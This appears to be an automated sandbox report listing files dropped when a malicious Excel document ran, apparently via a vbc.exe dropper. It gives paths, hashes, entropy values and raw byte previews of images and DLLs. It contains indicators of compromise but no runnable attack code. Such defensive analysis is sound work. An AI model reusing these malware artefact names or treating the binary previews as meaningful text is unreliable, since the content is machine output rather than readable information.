C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAB93B7F.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5396
Entropy (8bit):	7.915293088075047
Encrypted:	false
SSDEEP:	96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
MD5:	590B1C3ECA38E4210C19A9BCBAF69F8D
SHA1:	556C229F539D60F1FF434103EC1695C7554EB720
SHA-256:	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
SHA-512:	481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
Malicious:	false
Preview:	.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....\|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.\|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......\|>...?299I&.!....:....nW.4...?......\|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T.$I.J%....u.......qL.P(..F.......*....\....^..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AABEA29C.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 139 x 180, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2647
Entropy (8bit):	7.8900124483490135
Encrypted:	false
SSDEEP:	48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
MD5:	E46357D82EBC866EEBDA98FA8F94B385
SHA1:	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
SHA-256:	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
SHA-512:	8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
Malicious:	false
Preview:	.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.....Y\.....o..4...bl.6.1...Y.".\|.2A@y.../...X.X..X..2X.........o.Xz}go.m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v.......P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}......{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B28B50E5.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D082CF0A.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5396
Entropy (8bit):	7.915293088075047
Encrypted:	false
SSDEEP:	96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
MD5:	590B1C3ECA38E4210C19A9BCBAF69F8D
SHA1:	556C229F539D60F1FF434103EC1695C7554EB720
SHA-256:	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
SHA-512:	481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
Malicious:	false
Preview:	.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....\|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.\|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......\|>...?299I&.!....:....nW.4...?......\|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T.$I.J%....u.......qL.P(..F.......*....\....^..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D90BABA8.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED1C7F83.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE386947.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.0152800116954332
Encrypted:	false
SSDEEP:	3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
MD5:	BD4C089D8210CF4FCF74013334B2B925
SHA1:	1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
SHA-256:	BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
SHA-512:	5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
Malicious:	false
Preview:	....l...............C...........m>...&.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$...`....f.x.@h.%...<...............d...RQUQ............L.......$QUQ........ ...Id.x........ ............d.x............M....................Oq.....%...X...%...7...................{$..................C.a.l.i.b.r.i............................8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60648
Entropy (8bit):	6.273540391388373
Encrypted:	false
SSDEEP:	768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
MD5:	00B917A158BB5BF0D6BFF7D6B3C81B12
SHA1:	24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
SHA-256:	947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
SHA-512:	47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........P..K1.K1.K1.BIX.G1..Y.I1....J1..Y.D1..Y.C1..Y.H1.BIO.J1.BIH.J1.8S.N1.K1..1..X.H1..X.J1..X4.J1.K1\.J1..X.J1.RichK1.................PE..d....5;a.........." .........j...............................................0...... .....`.........................................`...................H.................... ..4.......p............................................... ............................text............................... ..`.rdata.. -..........................@..@.data...`'..........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..4.... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36576
Entropy (8bit):	6.18658407883376
Encrypted:	false
SSDEEP:	384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
MD5:	0B849C073801DCE25301ECA0146D534B
SHA1:	5BB9251CA83FE96C8F52B35637E674A629ED1468
SHA-256:	3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
SHA-512:	1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
Malicious:	false
Joe Sandbox View:	Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse Filename: DWG-1579.exe, Detection: malicious, Browse Filename: RFQ-1579.exe, Detection: malicious, Browse Filename: DWG-1579.exe, Detection: malicious, Browse Filename: RFQ-1579.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.%.>.v.>.v.>.v.FNv.>.v.\.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.`.w.>.v.>.v.>.v!W.w.>.v!W.w.>.v!W"v.>.v.>Jv.>.v!W.w.>.vRich.>.v........................PE..d......a.........." .....>...\.......@.................................................... .........................................pd..l....d.......................p..........H....T..p...........................`U...............P...............................text....<.......>.................. ..`.rdata.......P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CoverDes.exe.manifest

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1070
Entropy (8bit):	4.836891219007383
Encrypted:	false
SSDEEP:	24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
MD5:	9B48061E7B9FC35CD2624F2B9102549E
SHA1:	9DA640A8AF809549031916AB143026FAAF3B1E74
SHA-256:	84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
SHA-512:	01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
Malicious:	false
Preview:	.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0

C:\Users\user\AppData\Local\Temp\Strepera.wad

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	77432
Entropy (8bit):	6.5191464617024995
Encrypted:	false
SSDEEP:	1536:0ryhqjc8wTqJ39FNvl4UXgmBfCotcEntclFVdwJZp:0ryTk3HdyYgmBfCscEilFVG
MD5:	0CAED7F18389A6CC24391E0400C2BE47
SHA1:	59288CED440D46970090F25983B409BB25F43BBF
SHA-256:	E8C48296D444C8EDBF6169CA9E3C5334B0813BFC684C2E99BFD61C692A3784F1
SHA-512:	AFC59C8EA01D5F96DFAB3CD08F088FF2136542C0F13435EE9D63795CD8BDEF6D746408296883CD9052BF21D6E87388295B4682F06913CC982B21868704277B93
Malicious:	false
Preview:	....f.f.....GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS...&..l..._............}.a;'a..gY.DN.Ql.`.(+#;......%3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6...............O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..gY.DN.Ql.`.(+#;......1.......k..\|3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.......n....."q..h.r...m.v..X...F.1.BV..p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..gY.DN.Ql.`.(+#;......%3...4...:.............]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV.......f.........p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS.

C:\Users\user\AppData\Local\Temp\emblem-default-symbolic.symbolic.png

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	288
Entropy (8bit):	7.002703251110111
Encrypted:	false
SSDEEP:	6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
MD5:	A83F8C904AFA9E3F6A50D263747CF6DF
SHA1:	7B9D99B950518FCAF5AC59350823D2B20E82956F
SHA-256:	F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
SHA-512:	4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...N.Q...'.....X.s.^../H.f.....BJ....V[.b..qsvA..d..y.9?...z.`./....'..[.Q..'...M.....mwuN.\....h..(\|........p.K..I.%..... ..*..x.t~.kW.`V'.8.W.K.l.4..9.&\..k..3F........4.0.op.rL#.....N:.=.T.[....L.....p...#....IEND.B`.

C:\Users\user\AppData\Local\Temp\face-crying.png

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.712327619290152
Encrypted:	false
SSDEEP:	12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
MD5:	473EE416AF2C1AE05AA7D5D004C9B3D2
SHA1:	EEC352E25F562C0386D5C92384A70B3005D40D6F
SHA-256:	2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
SHA-512:	2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
Malicious:	false
Preview:	.PNG........IHDR................a...DIDATx.e.C..H.F_..tzl{m.m.m.m..;=F+..j.......r.........hZ...%Sn...Z....\|g...o.c..f..k..#.Y.5..2...r44.t...[\|.EW....E..3v....o...n...y.V.%.\g.].XY.).PQ..h~.Mu.:I.~.!{dt...-....c........~.ihs..<.23h.q...AA....P.O.d.#....S%....w....~(.Yg.mL.`..r.U?A.D......%.t..~.b..wl...G\r.......,^m.b%..??...?./........O..w\\|..t..5...^x....cK..?..b...3^#i.xYp3.>..C<Q.yg^.3.=..;./..!.`.....dq%...`..wB....q.2....W....S`....E....q3.A....9...."..].+.f...-.Z)d*..h..O>......c>...=.P..!...pw}g..t&.=..Dd...i.f......\....-JO0hW....!.ic.%...s.+...iG\|..MK...O_..;_.q_....\|...F....M...O...o..5.=...y{...]hn..Z..L+..`r.&I...5t._Dz..m.~$n$..\|.u}_.n\|.53..b.+Zn.bCA.1..x..hv?.{8...!\J......>OukN..{...[#.....7....k..L.#...D.y:K5.\|.&..XV.U..rb..T..G..6.I...~.....i.#ike...9/B_&.....^v]..._.l.Et.i..M..l.B1...A.....>._...P.,... ....IEND.B`.

C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	214568
Entropy (8bit):	6.30310219025288
Encrypted:	false
SSDEEP:	3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
MD5:	6D01A897D44DD4D25D7E1264407210FD
SHA1:	332C3ADE84D0C1E5BE298C037F9FE222620343B2
SHA-256:	DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
SHA-512:	54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...#.B..........P..........d....................................2.....`... ......................................P.......`......................."..($..................................@...(....................c..8............................text....A.......B..................`.P`.data........`.......F..............@.`..rdata..\....p.......H..............@.`@.pdata..............................@.0@.xdata....... ......................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....X...........................@.@..tls................................@.@..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF05A7AD9DA4C87F9C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA94E90DA021B0F1F.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB678E6B782DADFF4.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
